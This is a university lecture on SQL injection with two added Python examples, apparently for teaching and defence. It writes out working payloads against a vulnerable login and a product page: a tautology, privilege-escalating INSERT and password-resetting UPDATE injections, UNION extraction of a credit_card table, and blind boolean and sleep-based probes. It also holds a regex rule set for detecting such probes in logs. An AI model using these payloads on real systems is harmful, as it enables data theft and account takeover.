Today
• We have finished analyzing the security of network protocols
• We will now focus on web applications and their vulnerabilities (and attacks)
– SQL injection
Eike Ritter Network Security - Lecture 9 1
SQL injection
• Input validation vulnerability
• SQL queries are built using (unsanitized) data provided by the users
  String q = "SELECT user, pwd FROM users "
           + "WHERE user='" + request.getParameter("user") + "'";
  stmt.executeQuery(q);
• If the attacker provides as parameter special characters such as ' (tick), -- (comment), + (space), % (wildcard), it is possible to:
– Modify queries in an unexpected way
– Probe the database
– Run commands (e.g., using xp_cmdshell in MS SQL Server)
SQL injection
Query construction:
  "SELECT user, pwd FROM users " + "WHERE user='" + request.getParameter("user") + "'";
Input value for user: foo
Resulting SQL query:
  SELECT user, pwd FROM users WHERE user = 'foo'
SQL injection
Query construction:
  "SELECT user, pwd FROM users " + "WHERE user='" + request.getParameter("user") + "'";
Input value for user: ' OR 1=1#
Resulting SQL query:
  SELECT user, pwd FROM users WHERE user = '' OR 1=1#'
SQL injection
• The application is not vulnerable if it uses prepared statements
  PreparedStatement authQuery = conn.prepareStatement(
      "SELECT user, pwd FROM users WHERE user = ?");
  authQuery.setString(1, request.getParameter("user"));
  ResultSet rs = authQuery.executeQuery();
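As an added example that is not part of the lecture slides: the concatenated query from the earlier slide next to its parameterised form, both run against a constructed in-memory SQLite table named users with two constructed rows. SQLite is used so the example runs offline; its comment token is -- rather than MySQL's #, so the constructed tautology input ends with "-- " instead of "#". The helper names (make_db, lookup_vulnerable, lookup_prepared, quote_causes_error) are this example's own.

```python
import sqlite3

# Constructed stand-in for the lecture's users table (two sample rows).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("foo", "bar"), ("admin", "s3cret")])
    return conn

# Same construction as the slide's Java snippet: the request parameter is
# pasted straight into the SQL text, so quote characters in it alter the query.
def lookup_vulnerable(conn, user):
    q = "SELECT user, pwd FROM users WHERE user = '" + user + "'"
    return conn.execute(q).fetchall()

# Parameterised equivalent of PreparedStatement/setString: the value reaches
# the engine separately from the SQL text and is never parsed as SQL.
def lookup_prepared(conn, user):
    return conn.execute(
        "SELECT user, pwd FROM users WHERE user = ?", (user,)).fetchall()

# The probe from the "Finding SQL injections" slide: does a lone quote make
# the database raise a syntax error?  True when the query fails to parse.
def quote_causes_error(lookup, conn):
    try:
        lookup(conn, "'")
    except sqlite3.OperationalError:
        return True
    return False

# Constructed tautology input; "-- " is SQLite's comment token (MySQL uses "#").
TAUTOLOGY = "' OR 1=1 -- "

if __name__ == "__main__":
    conn = make_db()
    print("normal input :", lookup_vulnerable(conn, "foo"), lookup_prepared(conn, "foo"))
    print("tautology    :", lookup_vulnerable(conn, TAUTOLOGY), lookup_prepared(conn, TAUTOLOGY))
    print("quote probe raises? vulnerable:", quote_causes_error(lookup_vulnerable, conn),
          " prepared:", quote_causes_error(lookup_prepared, conn))
```

With the normal input both lookups return the single foo row; with the tautology the concatenated query returns every row while the parameterised one returns nothing, because the whole string is compared as a literal user name. The lone-quote probe raises an error only in the concatenated version, which is exactly the signal the "Finding SQL injections" slide describes, and why a parameterised application gives a tester nothing to find.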
Finding SQL injections
• Provide the application specially-crafted values and check if they cause errors
– '
– "
– #
• Inject an expression (typically a tautology) and check if it is interpreted:
– user=' OR 1=1 #
Exploiting SQL injections
• Take advantage of the server's error messages to learn the structure of the database and its tables
  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'foo, user, pwd from users' at line 1
Exploiting different statement types
• INSERT INTO users (user, pwd, privs) VALUES ('foo', 'bar', 1)
• Suppose the user field is vulnerable
• Attacker submits:
  foo', 'bar', 0) #
• User foo is now registered with administrative privileges (0)
Exploiting different statement types
• UPDATE users SET pwd = 'newbar' WHERE user = 'foo' AND pwd = 'bar'
• Again, the user field is vulnerable
• Attacker submits:
  admin' #
• Attacker resets the admin's password to a string of his/her choice
Exploiting SQL injection – cont’d
• You identified a SQL injection in the SELECT query used in the login page
  "SELECT user, pwd FROM users WHERE user = '" + request.getParameter("user") + "'"
• Great, you can enumerate all the users and their passwords
• What if you are interested in the content of the credit_card table?
• UNION operator to the rescue:
  foo' UNION SELECT cc_n, cc_name FROM credit_card
Exploiting SQL injection – cont’d
• Finding out more information about the database
– Examples specific to MySQL (similar for other DBs)
– Examples may fail depending on the specific configuration of the DB
• List users of the database:
  select distinct user from mysql.user
• List tables in the database:
  select table_name, table_schema from information_schema.tables
• Get column name and type for a table in a given DB:
  select column_name, column_type from information_schema.columns where table_schema = 'mydb' and table_name = 'users'
Blind SQL injection
• Suppose error messages are disabled
– Unsure whether command is executed correctly
• How do we know if execution was successful?
• Technique:
– Conditional responses
• Special case: timing techniques
– Out-of-band channel
Conditional responses
• We leverage the SQL injection to ask boolean questions to the server
– Questions that have a true/false answer
  • Are we running as root?
  • Is the first letter of the current database 'a'?
• Technique
– Establish baseline: determine what response is provided by the application for a true question and for a false question
  • "true page": page returned for a true question
  • "false page": page returned for a false question
– Inject question
– Compare result with baseline
  • Did we obtain a true page or a false page?
Conditional responses
• Scenario:
– Assume there is a SQL injection on the product_id parameter: /view?product_id=N
– True page: "Details about product…"
– False page: "No information about the product you searched"
• Injections:
– product_id=42 AND user() = 'root'
– product_id=42 AND substring(database(), 1, 1) = 'a'
Establishing the baseline
• Keywords
– Search for keywords that appear in the true page only and in the false page only
• MD5
– Hash the resulting page
• HTML structure differences
– Differences in the DOM tree structure
• Useful inputs to determine the baseline
– True question: 1=1
– False question: 1=0
Time-based techniques
• Leverage time delays to infer execution status
• Often the attacker can force a query to take a long time if a certain condition is met
– waitfor (SQL Server)
– sleep (MySQL)
• Technique:
– Hypothesis: "we are running as root"
– Validation: issue a query that takes 5 seconds if the current user is actually root, and terminates very quickly otherwise
Time-based techniques (MySQL)
• Are we running as root?
  select if(user() = "root", sleep(5), 1);
• Is the first letter of the user 'a'?
  select if(substring(user(), 1, 1) = 'a', sleep(10), 2);
  1 row in set (0.00 sec)
• Is the first letter of the user 'n'?
  select if(substring(user(), 1, 1) = 'n', sleep(10), 2);
  1 row in set (10.00 sec)
• How do we determine all the letters in the username?
– 10 seconds per try
– Binary search, anyone?
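As an added example from the defender's side, not part of the lecture: a small log-scanning check that flags, in web-server access logs, parameter values shaped like the conditional-response probes (boolean questions about user() and database()) and the time-based probes (sleep, waitfor) of the preceding slides, plus the UNION form from the earlier exploitation slide. A request is additionally marked as a timing hit when it both carries a delay function and took longer than an assumed threshold, which is the server-side view of the "10.00 sec" result shown above. The log format (method, path, status, response time in milliseconds), the log lines, the pattern list and the 5-second threshold are all constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines: method, path, status, response time in ms.
# The probe values mirror the slides (boolean question, letter test, sleep, UNION).
SAMPLE_LOG = """\
GET /view?product_id=42 200 12
GET /view?product_id=42+AND+user()%3D%27root%27 200 15
GET /view?product_id=42+AND+substring(database(),1,1)%3D%27a%27 200 14
GET /view?product_id=42+AND+if(substring(user(),1,1)%3D%27n%27,sleep(10),2) 200 10004
GET /login?user=foo%27+UNION+SELECT+cc_n,cc_name+FROM+credit_card 200 20
GET /view?product_id=17 200 11
"""

# Labelled patterns for the injection shapes discussed in the lecture
# (constructed for this example; a production rule set is broader).
PATTERNS = [
    ("boolean-condition", re.compile(r"\b(and|or)\b[^=]*=", re.I)),
    ("db-introspection", re.compile(r"\b(user|database|version)\s*\(\s*\)|information_schema", re.I)),
    ("time-delay", re.compile(r"\b(sleep|benchmark|waitfor)\b", re.I)),
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("comment-terminator", re.compile(r"(--|#|/\*)")),
]
SLOW_MS = 5000  # assumed threshold: at or above this, a delay probe succeeded

def analyse(line):
    """Decode one log line's query string and report which parameter values
    match which patterns, plus whether a delay probe coincided with a slow reply."""
    method, path, status, ms = line.split()
    ms = int(ms)
    findings = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        labels = [label for label, rx in PATTERNS if rx.search(value)]
        if labels:
            findings.append((name, labels))
    delay_probe = any("time-delay" in labels for _, labels in findings)
    return {"path": path, "ms": ms, "findings": findings,
            "timing_hit": delay_probe and ms >= SLOW_MS}

def scan(log_text):
    """Return the analysis of every line that matched at least one pattern."""
    return [r for r in (analyse(l) for l in log_text.splitlines() if l.strip())
            if r["findings"]]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        flag = "TIMING" if r["timing_hit"] else "      "
        print(f"{r['ms']:>6} ms {flag} {r['findings']}  {r['path']}")
```

Decoding the query string before matching matters: the probes arrive URL-encoded (%27 for the quote, + for the space), so a rule run on the raw request line would miss them. Pairing the delay pattern with the measured response time separates an attacker's successful timing probe from the many requests that merely mention a function name.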
Take away point and next time
SQL injection
• Basic techniques
• More advanced techniques
– E.g., UNION queries
• Blind injection
– Conditional responses
– Time-based techniques
Next time
• More SQL injection
• Cross-site scripting vulnerabilities (XSS)
• Cross-site request forgery (CSRF)
Read more
• C. Anley, (more) Advanced SQL injection
• K. Spett, Blind SQL Injection
• C. Hotchkies, Blind SQL Injection Automation Techniques
• F. Mavituna, SQL Injection Cheat Sheet
• B. Damele and A. Guimaraes, Advanced SQL injection to operating system full control